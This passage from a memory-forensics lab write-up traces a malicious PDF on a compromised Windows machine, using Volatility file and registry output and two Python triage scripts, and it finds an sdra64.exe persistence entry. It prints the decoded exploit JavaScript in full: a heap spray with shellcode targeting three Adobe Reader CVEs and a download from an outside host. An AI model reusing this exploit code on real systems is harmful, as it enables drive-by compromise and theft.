11000100001011000101000001011000110000001100010111010101100011000001110001001100011000000010000000110000001010010110100010100000010010001011100011011000101110001010000000101100100001000010000110011001001001010101000011101000110001001001010101001001000000001110100011111100011111000011110000000100011111011110100001111100101101001001010111110101110101000010110001001000011100010000110000101101111110010000100011100000101111011100100110101101011101011001100000110000111110010001100100111000010111001000010011111000011011011111110111011101011110010011000000100000000111001000000101011000100011000110110010111100101101011011010001001101111001001011010010110000000111010110100100000100000010011111010010101000100110010111010111000101000000011010100010111000111100011000110000010001110101001000110011101100110010010110100101000101010111001111000001101100101111011100010101100101000100011111010011010100100001011110100000000001011100011100010001011000001100010000010100001101011001000101110000111000000001011111100011011000001111011011110001111100110010011101010001010001100011001100000001011100011010001111100011000000100110000011100001100100010010010111100101100001111011011110100011011000000010011011000111100001101111011111010011000100100011000001100111101001110101010101110011010000010011011100100101111101111011011001100010100000100000011011000000100001001111010110110000101100011011010001100100111001000001011110000001101100010001001100010101101001111110011111000011100100010110011010010101100101111101001001000011101100111011010111110101100000011011011100000000010000011111011100000111110101000011011100010001101100110111011101110111011100100011011101100000010100111111011100110000001101010101000011000000011000111110001100100001010001100100010000100011000100000010010101000101000101011110010000010000100100110110010100000111111001110111001100110001000000010110010100100110001000000000000100100001101100010110000101010111100101100111010101010000101000100101000101110000010001001110010011000000101100
011001010100100010101001101110000110110000111100101111010110000100001000111110000000110001000100101101011000110100011101011111010001000010010000111010001111110010110000000011011000010000011000110110000100100100011100010011001000000001100100100111000101100000110001110000010010000000011000100101011010000111101101110010011101000010101000000111010011010100010001110111010111010000111000011111010110000110011001000110011011100001011000110010010101110010100101001011001100000
[/code]

Decoding the above code yields the following.
[code]function OzWJi(rzRoI,fxLUb){while(rzRoI.length2<fxLUb){rzRoI+=rzRoI;}
return rzRoI.substring(0,fxLUb/2);}
function bSuTN(){var Uueqk=sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u323D\u0000%25%30%25%30%25%30%25%30%25%30%25%30");var HWXsi=202116108;var ZkzwV=[];var HsVTm=4194304;var EgAxi=Uueqk.length
2;var fxLUb=HsVTm-(EgAxi+0x38);var rzRoI=sly("\u9090\u9090");rzRoI=OzWJi(rzRoI,fxLUb);var tfFQG=(HWXsi-4194304)/HsVTm;for(var gtqHE=0;gtqHE<tfFQG;gtqHE++){ZkzwV[gtqHE]=rzRoI+Uueqk;}
var eHmqR=sly("\u0c0c\u0c0c");while(eHmqR.length<44952)eHmqR+=eHmqR;this.collabStore=Collab.collectEmailInfo({subj:"",msg:eHmqR});}
function Soy(){var dwl=new Array();function ppu(BtM,dqO){while(BtM.length2<dqO){BtM+=BtM;}
BtM=BtM.substring(0,dqO/2);return BtM;}
XrS=0x30303030;HRb=sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u313D\u0000\u0000%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26");var jxU=4194304;var RaR=HRb.length
2;var dqO=jxU-(RaR+0x38);var BtM=sly("\u9090\u9090");BtM=ppu(BtM,dqO);var JYD=(XrS-4194304)/jxU;for(var Prn=0;Prn<JYD;Prn++){dwl[Prn]=BtM+HRb;}
var IdI="66055447950636260127";for(sly=0;sly<138*2;sly++){IdI+="3";}
util.printf("%45000f",IdI);}
function ynu(shG)
{shG=shG.replace(/[+1]/g,"0");shG=shG.replace(/[+2]/g,"9");shG=shG.replace(/[+3]/g,"8");shG=shG.replace(/[+4]/g,"7");shG=shG.replace(/[+5]/g,"6");shG=shG.replace(/[+6]/g,"5");shG=shG.replace(/[+7]/g,"4");shG=shG.replace(/[+8]/g,"3");shG=shG.replace(/[+9]/g,"2");shG=shG.replace(/[+0]/g,"1");return shG;}
function XiIHG(){var cqcNr=sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u333D\u0000\u1334\u1334");dPl=sly("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+cqcNr;FQI=sly("\u9090\u9090");fhT=5*2;sLa=fhT+dPl.length;while(FQI.length<sLa)FQI+=FQI;NJn=FQI.substring(0,sLa);eUq=FQI.substring(0,FQI.length-sLa);while(eUq.length+sLa<0x40000)eUq=eUq+eUq+NJn;Cwy=[];for(XWT=0;XWT<180;XWT++)Cwy[XWT]=eUq+dPl;var kKG=4012;var LwZ=Array(kKG);for(XWT=0;XWT<kKG;XWT++)
{LwZ[XWT]=sly("\u000a\u000a\u000a\u000a");}
Collab.getIcon(LwZ+"_N.bundle");}
var sly=unescape,ZgA=app.viewerVersion.toString(),TjP=this;if(ZgA<8)
{bSuTN();}
if(ZgA>=8&&ZgA<9)
{Soy();}
if(ZgA<=9)
{XiIHG();}
[/code]

If the Adobe Reader version is lower than 8, the following vulnerability is used:
bSuTN() : Collab.collectEmailInfo / CVE-2007-5659

If the version is 8, or higher than 8 and lower than 9, the following vulnerability is used:
Soy() : util.printf / CVE-2008-2992

If the version is 9 or lower than 9, the following vulnerability is used:
XiIHG() : Collab.getIcon / CVE-2009-0927

The URL that is ultimately contacted is the following:
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=x
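Once the script is readable, the questions to answer are which Reader APIs it actually calls, which viewerVersion range routes to each, and whether the usual heap-spray building blocks are present. The added Python example below (not from the write-up) performs that static triage using the API-to-CVE mapping listed just above. Its input is a constructed skeleton that keeps the control flow of the decoded script and replaces the payload strings with short stand-ins; real input would be the output of the decoding step.

```python
"""Static triage of Acrobat JavaScript recovered from a PDF: vulnerable API calls,
the version branch guarding each, and heap-spray indicators. Constructed sample below."""
import re

# API -> CVE, as listed in the write-up above.
VULNERABLE_APIS = {
    "Collab.collectEmailInfo": "CVE-2007-5659",
    "util.printf": "CVE-2008-2992",
    "Collab.getIcon": "CVE-2009-0927",
}


def find_vulnerable_apis(js: str) -> dict:
    """{api: cve} for each API that is called (name followed by '('), not merely mentioned."""
    return {api: cve for api, cve in VULNERABLE_APIS.items()
            if re.search(re.escape(api) + r"\s*\(", js)}


def version_branches(js: str):
    """[(condition, function)] for every `if (cond) { func(); }` in the script."""
    return re.findall(r"\bif\s*\((.*?)\)\s*\{\s*(\w+)\s*\(\s*\)", js)


def heap_spray_indicators(js: str) -> dict:
    """Heuristics that together characterise a spray: unescape aliased to another name,
    runs of 0x90 (NOP) in \\u or %u escapes, the repeated 0c0c spray address, and a
    switch on app.viewerVersion to pick the exploit."""
    return {
        "unescape_alias": bool(re.search(r"\b\w+\s*=\s*unescape\b", js)),
        "nop_run": bool(re.search(r"(?:\\u9090|%u9090){4,}", js)),
        "spray_address": bool(re.search(r"(?:\\u0c0c|%u0c0c){2,}", js)),
        "version_switch": "app.viewerVersion" in js,
    }


def triage(js: str) -> dict:
    """One report combining the three views above."""
    return {"apis": find_vulnerable_apis(js),
            "branches": version_branches(js),
            "indicators": heap_spray_indicators(js)}


# Constructed sample: the control flow of the decoded script above with the payload
# strings replaced by short stand-ins (raw string so the \u escapes stay literal text).
SAMPLE_JS = r"""
var sly=unescape,ZgA=app.viewerVersion.toString(),TjP=this;
function bSuTN(){var nops=sly("\u9090\u9090\u9090\u9090\u9090");var e=sly("\u0c0c\u0c0c");
  this.collabStore=Collab.collectEmailInfo({subj:"",msg:e});}
function Soy(){var s="6605544795";util.printf("%45000f",s);}
function XiIHG(){Collab.getIcon(LwZ+"_N.bundle");}
if(ZgA<8)
{bSuTN();}
if(ZgA>=8&&ZgA<9)
{Soy();}
if(ZgA<=9)
{XiIHG();}
"""

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_JS), indent=2))
```

The branch list reproduces the three version ranges stated above straight from the code, and the indicator set is what a PDF-scanning rule would key on: none of the four is conclusive alone, but a script that aliases unescape, builds long 0x90 runs and branches on app.viewerVersion has no benign reason to exist.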

7. List suspicious files that were loaded by any processes on the victim’s machine. From this information, what was a possible payload of the initial exploit be that would be affecting the victim’s bank account? (2pts)

Searching the output file saved in question 3 for the URL that the exploit code above contacts gives the following.
[code lang-bash]D:\Security Tools\Forensic\Volatility-1.3_Beta>cat output | grep search-network
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0
http://search-network-plus.com/favicon.ico
http://search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=1
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
http://search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=2
.
.
[omitted]
[/code]

Next, searching for files associated with the process with PID 1752 gives the following.
[code lang-bash]D:\Security Tools\Forensic\Volatility-1.3_Beta>c:\Python27\python.exe volatility files -p 1752 -f Bob.vmem
Pid: 1752
File   \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File   \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File   \lsarpc
File   \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr107.tmp
File   \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr106.tmp
File   \Program Files\Adobe\Acrobat 6.0\Resource\Font
File   \Program Files\Adobe\Acrobat 6.0\Resource\CMap
File   \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File   \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr10C.tmp
File   \DOCUME~1\ADMINI~1\LOCALS~1\Temp\plugtmp\PDF.php
File   \Program Files\Adobe\Acrobat 6.0\Reader\Messages\ENU\RdrMsgENU.pdf
File   \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr110.tmp
File   \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File   \Documents and Settings\Administrator\Application Data\AdobeUM
File   \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File   \Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
File   \Documents and Settings\Administrator\Cookies\index.dat
File   \Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
File   \Endpoint
File   \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File   \ROUTER
File   \ROUTER
File   \Endpoint
File   \AsyncConnectHlp
[/code]

In the list above, a file at the path DOCUME~1\ADMINI~1\LOCALS~1\Temp\plugtmp\PDF.php can be seen.

8. If any suspicious files can be extracted from an injected process, do any anti-virus products pick up the suspicious executable? What is the general result from anti-virus products? (6pts)

Can the file be extracted? Hmm.

9. Are there any related registry entries associated with the payload? (4pts)

The registry can be examined with a Volatility plugin. Download the Memory Registry Tools from the page below.
http://moyix.blogspot.com/2009/01/memory-registry-tools.html
[code lang-bash]D:\Security Tools\Forensic\Volatility>c:\Python27\python.exe volatility hivescan -f Bob.vmem
Offset          (hex)
44658696        0x2a97008
44686176        0x2a9db60
48529416        0x2e48008
55269896        0x34b5a08
57399112        0x36bd748
59082008        0x3858518
70588752        0x4351950
111029088       0x69e2b60
114539360       0x6d3bb60
121604960       0x73f8b60
180321120       0xabf7b60
191408992       0xb68ab60
244959264       0xe99c820

D:\Security Tools\Forensic\Volatility>c:\Python27\python.exe volatility hivelist -f Bob.vmem -o 0x2a97008
Address      Name
0xe1d6cb60   \Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1de0b60   \Documents and Settings\Administrator\NTUSER.DAT
0xe1769b60   \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe17deb60   \Documents and Settings\LocalService\NTUSER.DAT
0xe1797b60   \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe17a3820   \Documents and Settings\NetworkService\NTUSER.DAT
0xe1526748   \WINDOWS\system32\config\software
0xe15a3950   \WINDOWS\system32\config\default
0xe151ea08   \WINDOWS\system32\config\SAM
0xe153e518   \WINDOWS\system32\config\SECURITY
0xe139d008   [no name]
0xe1035b60   \WINDOWS\system32\config\system
0xe102e008   [no name]

D:\Security Tools\Forensic\Volatility>c:\Python27\python.exe volatility printkey -f Bob.vmem -o 0xe1526748 "Microsoft\Windows NT\CurrentVersion\Winlogon"
Key name: Winlogon (Stable)
Last updated: Sun Feb 28 05:12:34 2010

Subkeys:
   GPExtensions (Stable)
   Notify (Stable)
   SpecialAccounts (Stable)
   Credentials (Volatile)

Values:
REG_DWORD AutoRestartShell : 1 (Stable)
REG_SZ    DefaultDomainName : BOB-DCADFEDC55C (Stable)
REG_SZ    DefaultUserName : Administrator (Stable)
REG_SZ    LegalNoticeCaption :  (Stable)
REG_SZ    LegalNoticeText :  (Stable)
REG_SZ    PowerdownAfterShutdown : 0 (Stable)
REG_SZ    ReportBootOk : 1 (Stable)
REG_SZ    Shell      : Explorer.exe (Stable)
REG_SZ    ShutdownWithoutLogon : 0 (Stable)
REG_SZ    System     :  (Stable)
REG_SZ    Userinit   : C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe, (Stable)
REG_SZ    VmApplet   : rundll32 shell32,Control_RunDLL "sysdm.cpl" (Stable)
REG_DWORD SfcQuota   : 4294967295 (Stable)
REG_SZ    allocatecdroms : 0 (Stable)
REG_SZ    allocatedasd : 0 (Stable)
REG_SZ    allocatefloppies : 0 (Stable)
REG_SZ    cachedlogonscount : 10 (Stable)
REG_DWORD forceunlocklogon : 0 (Stable)
REG_DWORD passwordexpirywarning : 14 (Stable)
REG_SZ    scremoveoption : 0 (Stable)
REG_DWORD AllowMultipleTSSessions : 1 (Stable)
REG_EXPAND_SZ UIHost     : logonui.exe (Stable)
REG_DWORD LogonType  : 1 (Stable)
REG_SZ    Background : 0 0 0 (Stable)
REG_SZ    AutoAdminLogon : 0 (Stable)
REG_SZ    DebugServerCommand : no (Stable)
REG_DWORD SFCDisable : 0 (Stable)
REG_SZ    WinStationsDisabled : 0 (Stable)
REG_DWORD HibernationPreviouslyEnabled : 1 (Stable)
REG_DWORD ShowLogonOptions : 0 (Stable)
REG_SZ    AltDefaultUserName : Administrator (Stable)
REG_SZ    AltDefaultDomainName : BOB-DCADFEDC55C (Stable)
[/code]
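Both the `files -p 1752` listing in question 7 and the Winlogon `printkey` output above are plain text that is easy to miss things in by eye: the interesting entries are one `PDF.php` sitting in a `plugtmp` directory and one extra path appended to `Userinit`. The following is an added Python example, not code from the write-up or from Volatility, that parses those two output formats and surfaces exactly those anomalies. The excerpts embedded as input are shortened copies of the listings on this page; the temp-directory and script-extension heuristics and the Windows XP Winlogon defaults (`Explorer.exe`, `C:\WINDOWS\system32\userinit.exe`) are my assumptions for triage, not something the tool emits.

```python
import re

# --- Question 7: Volatility 1.3 `files -p <pid>` listing (lines of the form "File   <path>") ---

# Shortened excerpt of the `files -p 1752` output shown above (constructed input for the example).
FILES_OUTPUT = r"""Pid: 1752
File   \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9
File   \DOCUME~1\ADMINI~1\LOCALS~1\Temp\Acr107.tmp
File   \DOCUME~1\ADMINI~1\LOCALS~1\Temp\plugtmp\PDF.php
File   \Program Files\Adobe\Acrobat 6.0\Reader\Messages\ENU\RdrMsgENU.pdf
File   \Endpoint
"""

# Assumed triage heuristics: anything opened from a temp location, and anything whose name
# looks like a server-side script (a PDF viewer has no business opening a .php file).
TEMP_MARKERS = ("\\temp\\", "\\plugtmp\\", "\\temporary internet files\\")
SCRIPT_EXTS = (".php", ".asp", ".jsp")


def parse_files_output(text):
    """Return the paths from a `files` listing, skipping the 'Pid:' header."""
    return [line.split(None, 1)[1] for line in text.splitlines() if line.startswith("File")]


def suspicious_paths(paths):
    """(path, [reasons]) for every path that trips at least one heuristic."""
    hits = []
    for path in paths:
        low = path.lower()
        reasons = []
        if any(marker in low for marker in TEMP_MARKERS):
            reasons.append("temp-directory")
        if low.endswith(SCRIPT_EXTS):
            reasons.append("server-script-name")
        if reasons:
            hits.append((path, reasons))
    return hits


# --- Question 9: `printkey` output for the Winlogon key ---

# Shortened excerpt of the Winlogon printkey output shown above (constructed input for the example).
PRINTKEY_OUTPUT = r"""Key name: Winlogon (Stable)
Last updated: Sun Feb 28 05:12:34 2010

Values:
REG_SZ    Shell      : Explorer.exe (Stable)
REG_SZ    Userinit   : C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe, (Stable)
REG_EXPAND_SZ UIHost     : logonui.exe (Stable)
"""

# One value line: "<REG_TYPE>  <Name>  : <data> (Stable|Volatile)"
VALUE_LINE = re.compile(r"^(REG_\w+)\s+(\S+)\s*:\s*(.*?)\s*\((Stable|Volatile)\)\s*$")

# Assumed Windows XP defaults; anything else in these comma-separated values runs at logon.
DEFAULT_WINLOGON = {
    "shell": ["explorer.exe"],
    "userinit": [r"c:\windows\system32\userinit.exe"],
}


def parse_printkey_values(text):
    """Map value name -> raw data string for every REG_* line in printkey output."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values[m.group(2)] = m.group(3)
    return values


def winlogon_extras(values):
    """Entries in Shell / Userinit beyond the defaults. Userinit is a classic
    persistence spot: every extra path here is started by winlogon at each logon."""
    extras = {}
    for name, defaults in DEFAULT_WINLOGON.items():
        raw = next((v for k, v in values.items() if k.lower() == name), "")
        entries = [e.strip() for e in raw.split(",") if e.strip()]
        unexpected = [e for e in entries if e.lower() not in defaults]
        if unexpected:
            extras[name] = unexpected
    return extras


if __name__ == "__main__":
    for path, reasons in suspicious_paths(parse_files_output(FILES_OUTPUT)):
        print("files:", path, reasons)
    for name, entries in winlogon_extras(parse_printkey_values(PRINTKEY_OUTPUT)).items():
        print("winlogon:", name, "->", entries)
```

Run against the full outputs on this page, the first half reports the `plugtmp\PDF.php` entry (both a temp location and a script-named file handed to Acrobat), and the second half reports `C:\WINDOWS\system32\sdra64.exe` as the only non-default `Userinit` entry, which is the registry artifact question 9 is after.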
